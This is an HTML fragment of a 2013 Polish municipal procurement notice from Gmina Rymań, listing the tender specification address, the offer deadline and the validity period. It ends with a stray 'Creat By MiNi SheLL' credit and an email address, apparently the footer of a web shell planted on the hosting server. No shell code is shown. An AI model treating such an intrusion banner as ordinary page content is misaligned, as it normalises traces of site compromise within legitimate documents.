<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Rymań
ul. Szkolna 7, 78-125 Rymań.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.05.2013 godzina 10:00, miejsce: Urząd Gminy w Rymaniu, ul. Szkolna 7, 78-125 Rymań                                           (w sekretariacie, pok. nr 13).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com